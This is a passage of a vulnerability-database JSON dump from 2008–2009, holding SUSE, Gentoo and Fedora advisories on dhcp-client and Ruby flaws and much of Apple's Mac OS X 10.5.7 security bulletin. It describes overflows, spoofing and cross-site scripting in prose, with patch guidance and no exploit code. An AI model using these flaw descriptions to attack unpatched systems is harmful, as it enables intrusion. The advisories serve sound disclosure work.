exploitability is rather unlikely.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-07-15T16:27:03", "published": "2009-07-15T16:27:03", "id": "SUSE-SA:2009:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00003.html", "type": "suse", "title": "remote code execution in dhcp-client", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-2664", "CVE-2008-1447", "CVE-2008-2376", "CVE-2008-2663", "CVE-2008-3657", "CVE-2008-2725", "CVE-2008-2726", "CVE-2008-2662", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\"WEBRick\") and a class for XML parsing (\"REXML\"). \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Ruby interpreter and its standard libraries. Drew Yao of Apple Product Security discovered the following flaws: \n\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_str_buf_append() function (CVE-2008-2662).\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_ary_stor() function (CVE-2008-2663).\n * Memory corruption via alloca in the rb_str_format() function (CVE-2008-2664).\n * Memory corruption (\"REALLOC_N\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2725).\n * Memory corruption (\"beg + rlen\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2726).\n\nFurthermore, several other vulnerabilities have been reported: \n\n * Tanaka Akira reported an issue with resolv.rb that enables attackers to spoof DNS responses (CVE-2008-1447).\n * Akira Tagoh of RedHat discovered a Denial of Service (crash) issue in the rb_ary_fill() function in array.c (CVE-2008-2376).\n * Several safe level bypass vulnerabilities were discovered and reported by Keita Yamaguchi (CVE-2008-3655).\n * Christian Neukirchen is credited for discovering a Denial of Service (CPU consumption) attack in the WEBRick HTTP server (CVE-2008-3656).\n * A fault in the dl module allowed the circumvention of taintness checks which could possibly lead to insecure code execution was reported by \"sheepman\" (CVE-2008-3657).\n * Tanaka Akira again found a DNS spoofing vulnerability caused by the resolv.rb implementation using poor randomness (CVE-2008-3905).\n * Luka Treiber and Mitja Kolsek (ACROS Security) disclosed a Denial of Service (CPU consumption) vulnerability in the REXML module when dealing with recursive entity expansion (CVE-2008-3790).\n\n### Impact\n\nThese vulnerabilities allow remote attackers to execute arbitrary code, spoof DNS responses, bypass Ruby's built-in security and taintness checks, and cause a Denial of Service via crash or CPU exhaustion. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Ruby users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-1.8.6_p287-r1\"", "edition": 1, "modified": "2008-12-16T00:00:00", "published": "2008-12-16T00:00:00", "id": "GLSA-200812-17", "href": "https://security.gentoo.org/glsa/200812-17", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5162", "CVE-2008-1447", "CVE-2008-1891", "CVE-2008-2662", "CVE-2008-2663", "CVE-2008-2664", "CVE-2008-2725", "CVE-2008-2726", "CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3656", "CVE-2008-3657", "CVE-2008-3790", "CVE-2008-3905"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2008-10-09T21:29:45", "published": "2008-10-09T21:29:45", "id": "FEDORA:44ED1208741", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: ruby-1.8.6.287-2.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5162", "CVE-2008-1145", "CVE-2008-1447", "CVE-2008-1891", "CVE-2008-2662", "CVE-2008-2663", "CVE-2008-2664", "CVE-2008-2725", "CVE-2008-2726", "CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3656", "CVE-2008-3657", "CVE-2008-3790", "CVE-2008-3905"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2008-10-09T21:35:31", "published": "2008-10-09T21:35:31", "id": "FEDORA:1583020874A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: ruby-1.8.6.287-2.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:30", "bulletinFamily": "software", "cvelist": ["CVE-2009-0150", "CVE-2009-0152", "CVE-2008-3652", "CVE-2008-3659", "CVE-2008-3655", "CVE-2008-2383", "CVE-2009-0010", "CVE-2009-0847", "CVE-2009-0946", "CVE-2009-0943", "CVE-2009-0844", "CVE-2008-2939", "CVE-2009-0021", "CVE-2009-0157", "CVE-2008-3530", "CVE-2009-0164", "CVE-2009-0114", "CVE-2008-2666", "CVE-2009-0162", "CVE-2009-0144", "CVE-2009-0846", "CVE-2009-0520", "CVE-2009-0040", "CVE-2007-2754", "CVE-2008-2371", "CVE-2008-3443", "CVE-2004-1185", "CVE-2004-1184", "CVE-2008-3658", "CVE-2009-0149", "CVE-2008-3660", "CVE-2009-0148", "CVE-2008-5077", "CVE-2008-3529", "CVE-2009-0156", "CVE-2009-0945", "CVE-2009-0159", "CVE-2009-0165", "CVE-2008-3657", "CVE-2006-0747", "CVE-2009-0944", "CVE-2008-2829", "CVE-2009-0147", "CVE-2008-3863", "CVE-2009-0519", "CVE-2009-0154", "CVE-2008-3651", "CVE-2009-0158", "CVE-2009-0145", "CVE-2008-4309", "CVE-2008-1382", "CVE-2009-0942", "CVE-2008-5557", "CVE-2009-0155", "CVE-2008-1517", "CVE-2009-0146", "CVE-2009-0160", "CVE-2008-0456", "CVE-2009-0025", "CVE-2008-3790", "CVE-2009-0161", "CVE-2009-0153", "CVE-2009-0845", "CVE-2004-1186", "CVE-2008-3656", "CVE-2008-2665"], "description": "About the security content of Security Update 2009-002 / Mac OS X v10.5.7\r\n\r\n * Last Modified: May 12, 2009\r\n * Article: HT3549\r\n\r\nSummary\r\n\r\nThis document describes the security content of Security Update 2009-002 / Mac OS X v10.5.7, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.\r\n\r\nFor the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the Apple Product Security website.\r\n\r\nFor information about the Apple Product Security PGP Key, see "How to use the Apple Product Security PGP Key."\r\n\r\nWhere possible, CVE IDs are used to reference the vulnerabilities for further information.\r\n\r\nTo learn about other Security Updates, see "Apple Security Updates."\r\nProducts Affected\r\n\r\nProduct Security, Mac OS X 10.5\r\nSecurity Update 2009-002 / Mac OS X v10.5.7\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-2939\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11\r\n\r\n Impact: Visiting a malicious website via a proxy may result in cross-site scripting\r\n\r\n Description: An input validation issue exists in Apache's handling of FTP proxy requests containing wildcard characters. Visiting a malicious website via an Apache proxy may result in a cross-site scripting attack. This update addresses the issue by applying the Apache patch for version 2.0.63. Further information is available via the Apache web site at http://httpd.apache.org/ Apache 2.0.x is only shipped with Mac OS X Server v10.4.x systems. Mac OS X v10.5.x and Mac OS X Server v10.5.x ship with Apache 2.2.x.\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-2939\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a malicious website via a proxy may result in cross-site scripting\r\n\r\n Description: An input validation issue exists in Apache 2.2.9's handling of FTP proxy requests containing wildcard characters. Visiting a malicious website via an Apache proxy may result in a cross-site scripting attack. This update addresses the issue by updating Apache to version 2.2.11. Further information is available via the Apache web site at http://httpd.apache.org/\r\n\r\n *\r\n\r\n Apache\r\n\r\n CVE-ID: CVE-2008-0456\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Web sites that allow users to control the name of a served file may be vulnerable to HTTP response injection\r\n\r\n Description: A request forgery issue exists in Apache. Apache does not escape filenames when negotiating the correct content type to send to a remote browser. A user who can publish files with specially crafted names to a web site can substitute their own response for any web page hosted on the system. This update addresses the issue by escaping filenames in content negotiation responses.\r\n\r\n *\r\n\r\n ATS\r\n\r\n CVE-ID: CVE-2009-0154\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in Apple Type Services' handling of Compact Font Format (CFF) fonts. Viewing or downloading a document containing a maliciously crafted embedded CFF font may lead to arbitrary code execution. This update addresses the issue through improved bounds checking. Credit to Charlie Miller of Independent Security Evaluators working with TippingPoint's Zero Day Initiative for reporting this issue.\r\n\r\n *\r\n\r\n BIND\r\n\r\n CVE-ID: CVE-2009-0025\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: BIND is susceptible to a spoofing attack if configured to use DNSSEC\r\n\r\n Description: BIND incorrectly checks the return value of the OpenSSL DSA_do_verify function. On systems using the DNS Security Extensions (DNSSEC) protocol, a maliciously crafted DSA certificate could bypass the validation, which may lead to a spoofing attack. By default, DNSSEC is not enabled. This update addresses the issue by updating BIND to version 9.3.6-P1 on Mac OS X v10.4, and version 9.4.3-P1 for Mac OS X v10.5 systems. Further information is available via the ISC web site at https://www.isc.org/\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2009-0144\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Applications that use CFNetwork may send secure cookies in unencrypted HTTP requests\r\n\r\n Description: An implementation issue exists in CFNetwork's parsing of Set-Cookie headers, which may result in certain cookies being unexpectedly sent over a non-encrypted connection. This issue affects non-RFC compliant Set-Cookie headers that are accepted for compatibility reasons. This may result in applications that use CFNetwork, such as Safari, sending sensitive information in unencrypted HTTP requests. This update addresses the issue through improved parsing of Set-Cookie headers. This issue does not affect systems prior to Mac OS X v10.5. Credit to Andrew Mortensen of the University of Michigan for reporting this issue.\r\n\r\n *\r\n\r\n CFNetwork\r\n\r\n CVE-ID: CVE-2009-0157\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in the handling of overly long HTTP headers in CFNetwork. Visiting a malicious website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of HTTP headers. This issue does not affect systems prior to Mac OS X v10.5. Credit to Moritz Jodeit of n.runs AG for reporting this issue.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0145\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in CoreGraphics' handling of PDF files. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds and error checking.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0155\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer underflow in CoreGraphics' handling of PDF files may result in a heap buffer overflow. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to Barry K. Nathan for reporting this issue.\r\n\r\n *\r\n\r\n CoreGraphics\r\n\r\n CVE-ID: CVE-2009-0146, CVE-2009-0147, CVE-2009-0165\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Viewing or downloading a PDF file containing a maliciously crafted JBIG2 stream may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple heap buffer overflows exist in CoreGraphics' handling of PDF files containing JBIG2 streams. Viewing or downloading a PDF file containing a maliciously crafted JBIG2 stream may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit to Apple, Alin Rad Pop of Secunia Research, and Will Dormann of CERT/CC for reporting this issue.\r\n\r\n *\r\n\r\n Cscope\r\n\r\n CVE-ID: CVE-2009-0148\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted source file with Cscope may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in Cscope's handling of long file system path names. Using Cscope to process a maliciously crafted source file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n CUPS\r\n\r\n CVE-ID: CVE-2009-0164\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted web site may lead to unauthorized access of the Web Interface of CUPS\r\n\r\n Description: Under certain circumstances, the Web Interface of CUPS 1.3.9 and earlier may be accessible to attackers through DNS rebinding attacks. In the default configuration, this may allow a maliciously crafted website to start and stop printers, and access information about printers and jobs. This update addresses the issue by performing additional validation of the Host header. Credit: Apple.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2009-0150\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in the handling of disk images. Mounting a maliciously crafted sparse disk image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to Tiller Beauchamp of IOActive for reporting this issue.\r\n\r\n *\r\n\r\n Disk Images\r\n\r\n CVE-ID: CVE-2009-0149\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in the handling of disk images. Mounting a maliciously crafted sparse disk image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n enscript\r\n\r\n CVE-ID: CVE-2004-1184, CVE-2004-1185, CVE-2004-1186, CVE-2008-3863\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in enscript\r\n\r\n Description: enscript is updated to version 1.6.4 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the gnu web site at http://www.gnu.org/software/enscript/\r\n\r\n *\r\n\r\n Flash Player plug-in\r\n\r\n CVE-ID: CVE-2009-0519, CVE-2009-0520, CVE-2009-0114\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in Adobe Flash Player plug-in\r\n\r\n Description: Multiple issues exist in the Adobe Flash Player plug-in, the most serious of which may lead to arbitrary code execution when viewing a maliciously crafted web site. The issues are addressed by updating the Flash Player plug-in on Mac OS v10.5.x systems to version 10.0.22.87, and to version 9.0.159.0 on Mac OS X v10.4.11 systems. Further information is available via the Adobe web site at http://www.adobe.com/support/security/bulletins/apsb09-01.html\r\n\r\n *\r\n\r\n Help Viewer\r\n\r\n CVE-ID: CVE-2009-0942\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "help:" URL may lead to arbitrary code execution\r\n\r\n Description: Help Viewer loads Cascading Style Sheets referenced in URL parameters without validating that the referenced style sheets are located within a registered help book. A malicious "help:" URL may be used to invoke arbitrary AppleScript files, which may lead to arbitrary code execution. This update addresses the issue through improved validation of file system paths when loading stylesheets. Credit to Brian Mastenbrook for reporting this issue.\r\n\r\n *\r\n\r\n Help Viewer\r\n\r\n CVE-ID: CVE-2009-0943\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "help:" URL may lead to arbitrary code execution\r\n\r\n Description: Help Viewer does not validate that full paths to HTML documents are within registered help books. A malicious "help:" URL may be used to invoke arbitrary AppleScript files, which may lead to arbitrary code execution. This update addresses the issue through improved validation of "help:" URLs. Credit to Brian Mastenbrook for reporting this issue.\r\n\r\n *\r\n\r\n iChat\r\n\r\n CVE-ID: CVE-2009-0152\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: iChat AIM communications configured for SSL may downgrade to plaintext\r\n\r\n Description: iChat supports Secure Sockets Layer (SSL) for AOL Instant Messenger and Jabber accounts. iChat automatically disables SSL for AOL Instant Messenger accounts when it is unable to connect, and sends subsequent communications in plain text until SSL is manually re-enabled. A remote attacker with the ability to observe network traffic from an affected system may obtain the contents of AOL Instant Messenger conversations. This update addresses the issue by changing the behavior of iChat to always attempt to use SSL, and to use less secure channels only if the "Require SSL" preference is not enabled. This issue does not affect systems prior to Mac OS X v10.5, as they do not support SSL for iChat accounts.\r\n\r\n *\r\n\r\n International Components for Unicode\r\n\r\n CVE-ID: CVE-2009-0153\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting\r\n\r\n Description: An implementation issue exists in ICU's handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. This issue does not affect systems prior to Mac OS X v10.5. Credit to Chris Weber of Casaba Security for reporting this issue.\r\n\r\n *\r\n\r\n IPSec\r\n\r\n CVE-ID: CVE-2008-3651, CVE-2008-3652\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in the racoon daemon may lead to a denial of service\r\n\r\n Description: Multiple memory leaks exist in the racoon daemon in ipsec-tools before 0.7.1, which may lead to a denial of service. This update addresses the issues through improved memory management.\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0845\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted authentication packet may lead to a denial of service of a Kerberos-enabled program\r\n\r\n Description: A null pointer dereference issue exists in the Kerberos SPNEGO support. Processing a maliciously crafted authentication packet may lead to a denial of service of a Kerberos-enabled program. This update addresses the issue by adding a check for a null pointer. This issue does not affect systems prior to Mac OS X v10.5.\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0846, CVE-2009-0847\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted ASN.1 encoded message may lead to a denial of service of a Kerberos-enabled program or arbitrary code execution\r\n\r\n Description: Multiple memory corruption issues exist in Kerberos' handling of ASN.1 encoded messages. Processing a maliciously crafted ASN.1 encoded message may lead to a denial of service of a Kerberos-enabled program or arbitrary code execution. Further information on the issues and the patches applied is available via the MIT Kerberos website at http://web.mit.edu/Kerberos/\r\n\r\n *\r\n\r\n Kerberos\r\n\r\n CVE-ID: CVE-2009-0844\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Processing a maliciously crafted Kerberos data packet may lead to a denial of service of a Kerberos-enabled program\r\n\r\n Description: An out-of-bounds memory access exists in Kerberos. Processing a maliciously crafted Kerberos data packet may lead to a denial of service of a Kerberos-enabled program. This update addresses the issue through improved bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit: Apple.\r\n\r\n *\r\n\r\n Kernel\r\n\r\n CVE-ID: CVE-2008-1517\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A local user may obtain system privileges\r\n\r\n Description: An unchecked index issue exists in the kernel's handling of workqueues, which may lead to an unexpected system shutdown or arbitrary code execution with Kernel privileges. This update addresses the issue through improved index checking. Credit to an anonymous researcher working with Verisign iDefense VCP for reporting this issue.\r\n\r\n *\r\n\r\n Launch Services\r\n\r\n CVE-ID: CVE-2009-0156\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Downloading a maliciously crafted Mach-O executable may cause Finder to repeatedly terminate and relaunch\r\n\r\n Description: An out-of-bounds memory read access exists in Launch Services. Downloading a maliciously crafted Mach-O executable may cause the Finder to repeatedly terminate and relaunch. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n libxml\r\n\r\n CVE-ID: CVE-2008-3529\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A heap buffer overflow exists in libxml's handling of long entity names. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking.\r\n\r\n *\r\n\r\n Net-SNMP\r\n\r\n CVE-ID: CVE-2008-4309\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A remote attacker may terminate the operation of the SNMP service\r\n\r\n Description: An integer overflow exists in the netsnmp_create_subtree_cache function. By sending a maliciously crafted SNMPv3 packet, an attacker may cause the SNMP server to terminate, denying service to legitimate clients. This update addresses the issue by applying the Net-SNMP patches on Mac OS X v10.4.11 systems, and by updating net_snmp to version 5.4.2.1 on Mac OS X v10.5.x systems. The SNMP service is not enabled by default on Mac OS X or Mac OS X Server.\r\n\r\n *\r\n\r\n Network Time\r\n\r\n CVE-ID: CVE-2009-0021\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Network Time is susceptible to a spoofing attack if NTP authentication is enabled\r\n\r\n Description: The ntpd daemon incorrectly checks the return value of the OpenSSL EVP_VerifyFinal function. On systems using NTPv4 authentication, this may allow a maliciously crafted signature to bypass the cryptographic signature validation, which may lead to a time spoofing attack. By default, NTP authentication is not enabled. This update addresses the issue by properly checking the return value of the EVP_VerifyFinal function.\r\n\r\n *\r\n\r\n Network Time\r\n\r\n CVE-ID: CVE-2009-0159\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Using the ntpq command to request peer information from a malicious remote time server may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A stack buffer overflow exists in the ntpq program. When the ntpq program is used to request peer information from a remote time server, a maliciously crafted response may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Credit: Apple.\r\n\r\n *\r\n\r\n Networking\r\n\r\n CVE-ID: CVE-2008-3530\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A remote user may be able to cause an unexpected system shutdown\r\n\r\n Description: When IPv6 support is enabled, IPv6 nodes use ICMPv6 to report errors encountered while processing packets. An implementation issue in the handling of incoming ICMPv6 "Packet Too Big" messages may cause an unexpected system shutdown. This update addresses the issue through improved handling of ICMPv6 messages.\r\n\r\n *\r\n\r\n OpenSSL\r\n\r\n CVE-ID: CVE-2008-5077\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: A man-in-the-middle attacker may be able to impersonate a trusted server or user in applications using OpenSSL for SSL certificate verification\r\n\r\n Description: Several functions within the OpenSSL library incorrectly check the result value of the EVP_VerifyFinal function. A man-in-the-middle attacker may be able to impersonate a trusted server or user in applications using OpenSSL for SSL certificate verification for DSA and ECDSA keys. This update addresses the issue by properly checking the return value of the EVP_VerifyFinal function.\r\n\r\n *\r\n\r\n PHP\r\n\r\n CVE-ID: CVE-2008-3659, CVE-2008-2829, CVE-2008-3660, CVE-2008-2666, CVE-2008-2371, CVE-2008-2665, CVE-2008-3658, CVE-2008-5557\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in PHP 5.2.6\r\n\r\n Description: PHP is updated to version 5.2.8 to address multiple vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP website at http://www.php.net/\r\n\r\n *\r\n\r\n QuickDraw Manager\r\n\r\n CVE-ID: CVE-2009-0160\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: A memory corruption issue exists in QuickDraw's handling of PICT images. Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of PICT images. Credit: Apple.\r\n * QuickDraw Manager\r\n\r\n CVE-ID: CVE-2009-0010\r\n\r\n Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Opening a maliciously crafted PICT image may lead to an unexpected application termination or arbitrary code execution\r\n\r\n Description: An integer underflow in the handling of PICT images may result in a heap buffer overflow. Opening a maliciously crafted PICT file may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation of PICT images. Credit to Damian Put and Sebastian Apelt working with TippingPoint's Zero Day Initiative, and Chris Ries of Carnegie Mellon University Computing Services for reporting this issue.\r\n\r\n *\r\n\r\n ruby\r\n\r\n CVE-ID: CVE-2008-3443, CVE-2008-3655, CVE-2008-3656, CVE-2008-3657, CVE-2008-3790\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Multiple vulnerabilities in Ruby 1.8.6\r\n\r\n Description: Multiple vulnerabilities exist in Ruby 1.8.6. This update addresses the issues by updating Ruby to version 1.8.6-p287. Further information is available via the Ruby web site at http://www.ruby-lang.org/en/security/\r\n\r\n *\r\n\r\n ruby\r\n\r\n CVE-ID: CVE-2009-0161\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Ruby programs may accept revoked certificates\r\n\r\n Description: An incomplete error check exists in Ruby's use of the OpenSSL library. The OpenSSL::OCSP Ruby module may interpret an invalid response as an OCSP validation of the certificate. This update addresses the issue through improved error checking while verifying OCSP responses.\r\n\r\n *\r\n\r\n Safari\r\n\r\n CVE-ID: CVE-2009-0162\r\n\r\n Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6\r\n\r\n Impact: Accessing a maliciously crafted "feed:" URL may lead to arbitrary code execution\r\n\r\n Description: Multiple input validation issues exist in Safari's handling of "feed:" URLs. Accessing a maliciously crafted "feed:" URL may lead to the execution of arbitrary JavaScript. This update addresses the issues by performing additional validation of "feed:" URLs. These issues do not affect systems prior to Mac OS X v10.5. Credit to Billy Rios of Microsoft Vulnerability Research (MSVR), and Alfredo Melloni for reporting these issues.\r\n\r\n *\r\n\r\n Spotlight\r\n\r\n CVE-ID: 